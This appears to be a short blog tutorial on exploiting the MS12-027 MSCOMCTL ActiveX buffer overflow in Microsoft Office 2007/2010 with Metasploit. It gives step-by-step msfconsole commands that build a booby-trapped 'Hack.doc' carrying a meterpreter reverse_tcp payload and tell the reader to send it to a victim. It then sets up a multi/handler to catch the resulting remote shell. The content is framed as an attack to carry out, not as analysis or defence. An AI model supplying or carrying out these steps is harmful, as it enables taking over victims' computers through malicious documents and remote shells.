MS12-027 MSCOMCTL ActiveX Buffer Overflow
This module exploits a stack buffer overflow in MSCOMCTL.OCX. It uses a malicious RTF to embed the specially crafted MSComctlLib.ListViewCtrl.2 Control as exploited in the wild on April 2012. This module targets Office 2007 and Office 2010 targets. The DEP/ASLR bypass on Office 2010 is done with the Ikazuchi ROP chain proposed by Abysssec. This chain uses "msgr3en.dll", which will load after office got load, so the malicious file must be loaded through "File / Open" to achieve exploitation.
Exploit Targets
- 0 - Microsoft Office 2007 [no-SP/SP1/SP2/SP3] English on Windows [XP SP3 / 7 SP1] English (default)
- 1 - Microsoft Office 2010 SP1 English on Windows [XP SP3 / 7 SP1] English
Requirement
Attacker :Backtrack
Victim PC : Windows xp
step 1: open your terminal and type msfconsole
Step 2: now type use exploit/windows/fileformat/ms12_027_mscomctrl_bof
Step 3 : set the required paremeters
set payload windows/meterpreter/reverse_tcp
show options
set FILENAME Hack.doc (give name to the file you want)
set lhost 192.168.56.102
exploit
now the doc file which we have to sent to the victim is created at /root/.msf4/local/hack.doc
we have to send this file to the victim
Step 4: to get the reverse connection we set the multi handler
Now we have to use a multi handler session so that we can get the reverse connection to do that we have to use
use exploit/multi/handler
and
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.56.102
exploit
as the victim click on it the meterpreter session is on we done the job
No comments:
Post a Comment